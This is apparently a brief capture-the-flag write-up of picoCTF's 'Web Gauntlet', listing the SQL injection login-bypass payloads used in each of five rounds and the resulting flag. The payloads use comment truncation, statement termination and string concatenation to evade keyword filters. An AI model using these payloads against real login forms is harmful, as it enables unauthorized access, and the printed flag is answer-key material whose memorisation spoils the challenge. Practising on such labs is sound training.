WEB GAUNTLET

LEAD

Looking in the filter.php file we can see the filter parameters. Time to fight!⚔️

ROUND 1

Username : admin' --

Password: a

We move on to the next round! Using this bypass for the username and any text in the password!

ROUND 2

Username : admin';

Password: a' IS NOT ‘b

ROUND 3

Username : admin';

Password: a' IS NOT ‘b

ROUND 4

Username: ad'||'min';

Password: a' IS NOT ‘b

ROUND 5

Username: ad'||'min';

Password: a' IS NOT ‘b

FLAG

Navigating to the filter.php file

💡

picoCTF{y0u_m4d3_1t_a3ed4355668e74af0ecbb7496c8dd7c5}